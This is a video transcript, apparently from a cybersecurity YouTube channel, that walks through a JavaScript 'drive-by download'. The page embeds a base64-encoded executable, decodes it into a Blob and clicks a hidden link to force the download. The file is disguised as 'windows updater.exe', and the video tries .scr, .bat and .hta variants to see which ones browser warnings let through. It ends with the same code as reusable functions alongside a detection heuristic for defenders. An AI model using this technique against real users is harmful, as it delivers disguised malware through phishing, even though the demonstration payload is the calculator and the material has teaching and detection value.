INSTANT File Downloads with JavaScript

Captions
Have you ever been browsing the internet and all of a sudden a pop-up appears, and then a file is downloaded onto your computer automatically without any user interaction? Have you ever wondered, how do they do that, what is happening? Or maybe you're a penetration tester, a red teamer or an ethical hacker, and you're wondering, hey, that might be a pretty cool technique for some social engineering, some phishing, some deception, something that you want to weaponize and add to your toolkit. So in this video that is exactly what we are going to do. I'm going to show you some syntax, some simple quick showcase of how you might be able to put this together and instantly download a file onto a target or victim computer just by browsing to a page within their web browser, like Google Chrome, Internet Explorer, Firefox. So let's get to it.

Okay, so I'm going to be working in my Windows 11 virtual machine. I do want to be targeting a Windows operating system for this; it gives it a little bit more realism, although we could totally write this within Linux and Kali, in Ubuntu, whatever distribution you might like. I am going to open up my File Explorer, and within my desktop I do want to just simply create a new file. I'm going to create a text document, and we can end up renaming this, but ultimately we're going to create an HTML file. I'll call it index, and I'll actually change the view options to actually show file name extensions. I believe my face is in the way, but all that is is hitting the show file name extensions option, so that when I rename this I can right click and rename or edit the properties. I guess F2 is also a good hotkey that will work for me. And if I just change this to an HTML extension, that means I'm now working with a hypertext markup language file and I can include any other markup language it would be worthwhile for a web browser to actually render. That means we can also include JavaScript or some client-side code. And we get this pop-up: hey, if you change a file name extension it might become unusable. Yep, we totally know what we're doing here. And now you can see that's been created on the desktop and we can work with it in our file browser.

What I'm going to do next is right click and open with. I do want to open this with a text editor; I'll be using Visual Studio Code because I'm on Windows here. You could very well be using Sublime Text, or if you're working in the Linux world, hey, you could be using Vim or Emacs or whatever text editor suits your fancy here. But now we have opened up this empty file index.html and we can start to write some HTML. We'll start off with a doctype, which is good, necessary boilerplate for HTML code, and all HTML tags need to begin and end with their element tags, right, these less than, greater than arrows here, waka waka as you might hear them. And then we need a head tag and a body tag. That, if you aren't familiar with HTML, is where everything really lives within your application. What I'm going to end up doing is simply creating a header to have some text to render onto the page, but ultimately we need to be working within any tags that we particularly want, but ultimately we need to have JavaScript. Before I end up putting that together I do just want to validate this looks good and works for us, so I'm going to hop back over to that, open up this file within my web browser, and there I do have this small simple page. Good enough.

Let's go ahead and start to write some JavaScript. I am going to end up putting this within our body tag because I do kind of want it to render right away, and I'm going to end up adding a script tag. Now this is how we could just natively end up writing JavaScript. I believe you could add some other attributes here to make it, okay, third party or external, or have it reference or source some other location, but for the sake of our learning demonstration and exploration let's just put it all right here. So ultimately we want to create a couple variables, because the way that we end up providing a file to download is by, you know, kind of embedding the file into this own page so that it can just spit it out to the user. So we might give it a file name that we want to end up using. We could do something cheesy like windows updater.exe, fair to say, yeah. But then we need the actual file contents, or sort of the, oh, file data, right. And how will we actually embed this into the page? Well, some way to do that is honestly just slapping the entire contents of the file that we want into this location, or into some JavaScript file or something that it might be able to either externally load or read, just to still spit it out to you. And this is where you can really get creative. Again, for our showcase example I'm just going to end up embedding this, but again you could make it load or reach some other resource and actually access it some other way; you could have it redirect through a couple different layers of obfuscations or masks or whatever you want. But I'm just going to end up base64 encoding the data here.

Now what I'll end up doing is actually probably grabbing the calculator application and then base64 encoding that. Let's see if I can do that nice and easy within PowerShell. Okay, I've opened up the PowerShell command line, and I know that I want to get all the contents of C:\Windows\System32, and we'll just use again the calculator.exe as our proof of concept, as a small, trivial, innocent proof of concept. This gives us a whole lot of nothing; it is just the raw bytes. So we want to be able to actually embed that as base64. Let me grab the syntax, because I always forget how to do this in PowerShell; I'll find that online real quick. Okay, I just grabbed the syntax online. We created a base64 string variable where we convert to base64 string, getting the IO.File, reading all bytes from the specific file here. This will end up spitting it into that base64 string variable, but for the sake of me being able to copy and paste it I do just want to slap that to a temporary file. I guess I'll call that just temporary.log, and then we can go ahead and open that file, code temporary.log. There we go, here's a whole lot of base64. Cool, so we can copy and paste that.

So now again, this is just a proof of concept as to how you might be able to do this. Again, this is kind of simple, pretty easy, kind of trivial; again you could add whatever redirection or creative stuff you might like here to make that a little bit more fun or stealthy. But ultimately we're just using the base64 encoded rendition of the file, and now we need to be able to actually decode that within JavaScript. So what we can do is define a function here. While we have the file contents and the data here in base64, we need to convert that base64 to bytes, given some, I guess, b64 data as an argument, correct. Now we can go ahead and retrieve the binary values within JavaScript by running that atob function, and if you aren't familiar, atob will go ahead and base64 decode some values within JavaScript, and that's where we can pass in our b64 data. Now that returns a big long list, and we want to determine how long that list really is, so let's go ahead and create a new variable just to determine the length of that binary values. And then what we can do is ultimately create our own bytes data, a new array that we might like. We're going to end up creating a Uint8Array so that we are just retrieving the integer representation of all of these bytes, up to the length of the binary that we had already retrieved. Now I know that is kind of weird to think about, but we're just basically creating a secondary placeholder for the bytes of the file decoded from base64 and getting it into a representation that we can sanely play with within JavaScript.

So the way that we have to do that is actually look through every single byte, so you'll use a for loop to do this. We'll loop, i as our iterator, and increment up to that binary length, adding and incrementing all the way across. I might need to add a var i here, okay. And what we could do then is actually say our bytes data at that index, or counting with that iterator i, can equal our binary values that we've already retrieved from base64 decoding this value, and actually getting the character code at the position i, or that index. So this will go ahead and return out; in fact we actually have to return the bytes data buffer. So ultimately our function will go ahead and base64 decode this and return it all as bytes that we can work with within JavaScript, and that is how we might be able to retrieve the data and slap it out to the browser in a file download. But we need to end up doing that by specifying, okay, our new file bytes can equal our base64 to bytes function, passing in our file data that we know just above is that base64 encoded string. Perfect.

Now this is where the magic happens. This is where we have to go ahead and define a blob that will go ahead and actually encapsulate this data for us. In fact, that has to be a new Blob because it's a sort of object here, and it'll actually pass in the data, or the file bytes that we've just retrieved up top, into a blob, ultimately specifying, okay, this has a specific unique MIME type. So you pass that in with curly braces here to denote, okay, these are the options that might go to it, or however. Inside the blob is the data that you need, and you can see Visual Studio Code is helping us to find that, but ultimately our type is going to be an octet slash stream because this will be something that we have to download. So now that we've defined this blob object to kind of reference and refer to our data, we need to basically force the user to download the file, and we can do that by basically creating an HTML anchor tag, or that a element that you often see. So we can say, hey, let's use our document to go ahead and create a new element, and we'll go ahead and create a simple a tag. We'll go ahead and append that to the body of our document, and we can even make it invisible by setting some CSS styling, changing the display to be none, so that way it will not render on the page.

And now the important part: we need to create a URL that will reach out and actually access our blob that we created earlier, and I believe that is createObjectURL within that window, sort of sub-component or module within the window itself here, and we can go ahead and pass in our blob. Now we'll set this as our anchor's target here: a.href equals that URL that we've created, and then we want to actually force that to download our specific file name. That way it knows, okay, we're going to end up sending this file, Windows updater, based off of the blob that we've determined, created off of our base64 decoded data. And now that we have finally created that anchor object, we do need to force and click on that a tag, an HTML element, so it will begin the download automatically. We could also go ahead and use our window.URL.revokeObjectURL, and that will actually, I think, believe, remove this. And if there's any portion of this code that you don't exactly understand, you know, the whole point is to learn here. Let me see what this ends up doing: it releases an existing object URL that was previously created by calling URL.createObjectURL. So it looks pretty necessary for what we end up using with that syntax here. And this is actually end up creating our blob object, and if you want to learn more about the blob, you can see it's basically a file-like object of that raw data that we've been able to carve out from our base64. And again, how you include this base64, it doesn't need to be just slapped into this whole document on its own; you could go ahead and actually retrieve that from a different location or get creative with it, but again, for the showcase here that's A-okay.

So let's go see this thing in action. I'm gonna go ahead and open up my index.html, and theoretically we should be able to see this thing start a download. Now, because this is an executable file, because it literally has a .exe, you should see some browsers say, hey, this is a little bit weird, are you sure you want to download this, you don't normally download executables right off the internet. But this is still something that we might be able to work around and play with, and in fact we'll get to tinker with some of these file names super quick. Oh, actually looks like Windows updater just took that right away. You might have noticed that download down here, and of course it is simply the calculator application. Oh hey, SmartScreen probably at least saw that was a file with a mark of the web, or MOTW. That is something that, if we go explore it here, I'll close this out, if I move to my downloads, here's our windows updater.exe that we just downloaded. It is of course the Windows calculator, but checking out the properties over here, you might notice it has this optional security portion. It says, hey, this file came from another computer and might be blocked to help protect this computer. That is why SmartScreen and this blue thing ends up just popping up. If you wanted to run anyway, or don't run, sure, you very well could, but actually just unblocking that in the properties is what ends up, to say, labeling and not needing SmartScreen. There we go, there's our innocent benign proof of concept calculator here. But you can make this a payload, you can make this malicious, you could do really whatever you want with it. I'm a little bit surprised that that didn't, hey, trigger and warn like, hey, are you sure you want to download that? It might be because it's already, you know, a signed, weighted native Windows executable.

But how does that look in Edge? Let me actually open that up, get back to my desktop, let me open with Microsoft Edge. Oh, here it is: windows updater.exe isn't commonly downloaded, make sure you trust this thing before you do, and then you can end up running that keep option, and then they're like, look, are you really sure you want to do this? Like yeah, yeah, yeah, and it lets you do it. Then it's automatically downloaded; there was no interaction for me to do that other than yes, I'm cool with it. But if we were to change this to something like a Windows updater.com, and then if you wanted to, or like a batch script file, you very well could, but then you of course need to, you know, have an appropriately typed file for that file extension, so that once the user clicks on it it'll know to do that. I think also they do some interesting things here. And if I make this an .scr, which is again a screen saver file, everyone was tweaking out in the previous videos that I might have misspoke on, there it is still a Windows executable without a doubt, so I wonder if that will have the exact same functionality. Let's open this up in Chrome. Windows updater.scr, double clicking on that, we got SmartScreen. Oh, I do want to run that regardless, so let me hit run anyway, there's our calculator. Let me try that with Edge, open with Edge, yep, not commonly downloaded. So let's try a different, okay leave me alone, let me leave, let me leave. You could use like batch; the thing is I have seen some browsers, oh, windows.bat just took it on its own. It didn't, I would have expected Chrome to try and add another suffix to this like a .download or another file extension on top of the extension that it had previously. So how does Edge look? Yep, not commonly downloaded, so Edge is being a little bit, hey, finickier than Chrome is. Let me clear out these downloads here. You could change this to .hta for a hypertext application, something that mshta might be able to put together. You could have it run a JScript file, not simply JavaScript but targeting the Windows operating system, or VBA for Visual Basic, or VBS or VBE, I think, yeah, one of those, I don't know. Or you can do, force download a malicious document like a Microsoft Office macros document thing. A whole lot of options here. Let's try HTA, let's see if that would come through, and of course you would need to change the contents appropriately within your file data, but that's the proof of concept here and this is that syntax that might let you do it. Try that, windows updater.hta, cool, and if we wanted to, hey, it should let us just come through that without an issue.

Now again, this is an HTML file. If I were to host this on something like, hey, Apache or nginx or Python, like a simple HTTP server, or just an HTTP server, it should, I don't know, maybe do the very same thing. I'm opening this locally because it is client-side HTML and JavaScript. I wonder if that's worth anything changing. Do I have Python on this box? No, python3? No. All right, so I can't readily show you. I mean, I guess we could just slap that syntax somewhere else. Let me showcase this on a host. So I am just on my actual computer here, let me create just a simple, hey, index.html, and let's open that with Sublime Text, slap all this code in, and now let's get a terminal rolling. Cool, so here on my desktop let's do a python3 -m http.server, and yep, Python's good to do it. Okay, now I have a browser open, let's go to localhost:8000, and oh, okay, now Chrome is the one saying, hey, this type of file can harm your computer. Yes, and we can keep it; that's all the ask that it needs.

Hey, super quick, sorry, John from the future here, just wanted to make a note. This is actually something that some folks have seen Dropbox do, even in the URL, like in the link that you open in your address bar, after the question mark where a couple of the, like, HTTP GET variables are. I think there's one called dl, and I might be getting that name wrong, but honestly just changing a zero to a one or toggling that will make it an instant file download. So just an interesting tidbit, just want to note it. I think some people have noticed that's a little bit interesting or sketched sometimes, but hey, wanted to flag, Dropbox can do that just as well. So something to keep in mind.

Your mileage may vary with this; you do rely on a little bit of social engineering, a little bit of trickery, a little bit of, hey, getting the user to actually fall for opening this and detonating it on their own volition. You have at least made this easier by forcing and jamming the file download onto their machine, and it's a little bit more prompted, like, oh hey, it's a Windows update. It could very easily make that part of a ploy or dispatch option of a social engineering phishing scheme to, you know, trick a user to do something. I've heard this technique called a drive-by download; that is kind of what I tend to refer to it as, however, you know, that has its own connotation, so I tried not to say that within the first minute of the video. With that said, hey, it is the syntax you might be able to use for HTML, JavaScript, force an instant file download, and that is all it really takes. I'll try and slap this code out on a GitHub gist or something so it's accessible for you, but that's all that we end up doing, and you can go Google around if you'd like any more of that research and documentation on, like, oh, what is the blob, what is this window create URL, etc. You're just creating an element, forcing it to click, and having the code embedded in a way that the browser and JavaScript can render it out for you. Get creative with how you hide or mask that; it doesn't have to be base64, but that is one way to do it, and for learning, showcase, education here, I thought that would be worthwhile. Thanks so much for watching everybody. I've been rambling for way too long, let's close this thing out here. I love you, I'll see you in the next video. Like, comment, subscribe, you know the drill. Thanks everyone.
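The pipeline the video assembles by hand (base64 text decoded with atob, copied into a Uint8Array, wrapped in a Blob, handed to a hidden anchor that is clicked) is shown below as reusable functions, followed by a defender-side triage helper that looks for those same building blocks in a page's source. This is an added example written for this page, not John Hammond's code from the video or a GitHub gist of his. The Buffer fallback for runtimes without a global atob, the RISKY_EXTENSIONS list (taken from the extensions tried in the video) and the SAMPLE_PAGE string are assumptions and constructed data, not anything captured from a real site.

```javascript
// Added example (not the video's own code): the decode-and-blob steps from the
// transcript as functions, plus a page-source triage check for the same pattern.

// atob() is the browser/Node global the video uses; the Buffer fallback is an
// assumption for older Node runtimes that lack it.
const decodeBase64 = (typeof atob === 'function')
  ? atob
  : (s) => Buffer.from(s, 'base64').toString('binary');

// Base64 text -> Uint8Array, the same steps the transcript describes:
// decode to a "binary string", then copy each char code into a byte array.
function base64ToBytes(b64) {
  const binary = decodeBase64(b64);
  const bytes = new Uint8Array(binary.length);
  for (let i = 0; i < binary.length; i++) {
    bytes[i] = binary.charCodeAt(i);
  }
  return bytes;
}

// Wrap the bytes in a Blob with the generic binary MIME type, as in the video.
function buildDownloadBlob(bytes) {
  return new Blob([bytes], { type: 'application/octet-stream' });
}

// The hidden-anchor click the video ends with. Only runs where a DOM exists
// (a browser); under Node it returns false so the checks below still load.
function triggerDownload(blob, fileName) {
  if (typeof document === 'undefined' || typeof URL === 'undefined' ||
      typeof URL.createObjectURL !== 'function') {
    return false;
  }
  const a = document.createElement('a');
  a.style.display = 'none';
  const url = URL.createObjectURL(blob);
  a.href = url;
  a.download = fileName;
  document.body.appendChild(a);
  a.click();
  URL.revokeObjectURL(url); // release the object URL once the click has fired
  a.remove();
  return true;
}

// Extensions tried in the video; Windows treats all of them as runnable content.
// Assumed list for this example; ".com" will also match ordinary host names.
const RISKY_EXTENSIONS = ['exe', 'com', 'scr', 'bat', 'hta', 'vbs', 'vbe'];

// Defender-side triage: which building blocks of a forced download appear in a
// page's source? Returns indicator names in a fixed order (empty = none found).
function findForcedDownloadIndicators(html) {
  const found = [];
  if (/\batob\s*\(/.test(html)) found.push('atob-decode');
  if (/[A-Za-z0-9+/]{200,}={0,2}/.test(html)) found.push('large-base64-literal');
  if (/new\s+Blob\s*\(/.test(html)) found.push('blob-construction');
  if (/createObjectURL\s*\(/.test(html)) found.push('object-url');
  if (/\.download\s*=|\bdownload\s*=\s*["']/.test(html)) found.push('download-attribute');
  if (/\.click\s*\(\s*\)/.test(html)) found.push('synthetic-click');
  const riskyRe = new RegExp('["\'][^"\']*\\.(' + RISKY_EXTENSIONS.join('|') + ')["\']', 'i');
  const m = html.match(riskyRe);
  if (m) found.push('risky-extension:' + m[1].toLowerCase());
  return found;
}

// Constructed sample page mirroring the structure built in the video (not
// captured from a real site). The "file data" is repeated placeholder text.
const SAMPLE_PAGE = `<!DOCTYPE html><html><body><h1>Update</h1><script>
var fileName = "windows-updater.exe";
var fileData = "${'QUJD'.repeat(60)}";
var binary = atob(fileData);
var bytes = new Uint8Array(binary.length);
for (var i = 0; i < binary.length; i++) { bytes[i] = binary.charCodeAt(i); }
var blob = new Blob([bytes], { type: "application/octet-stream" });
var a = document.createElement("a");
a.style.display = "none";
a.href = window.URL.createObjectURL(blob);
a.download = fileName;
document.body.appendChild(a);
a.click();
window.URL.revokeObjectURL(a.href);
<\/script></body></html>`;

// A benign page with a plain download link, for contrast.
const BENIGN_PAGE = '<html><body><a href="report.pdf" download>Report</a></body></html>';
```

Run in a browser console, `triggerDownload(buildDownloadBlob(base64ToBytes(data)), name)` reproduces the video's behaviour; under Node only the decoder and the triage function are exercised. The indicator list is deliberately a heuristic: no single hit is conclusive (many legitimate sites build object URLs or decode base64), but all seven together on one page is exactly the shape the transcript walks through.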
Info
Channel: John Hammond
Views: 154,605
Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners
Id: KTxsBW9SkOU
Length: 21min 5sec (1265 seconds)
Published: Mon Sep 26 2022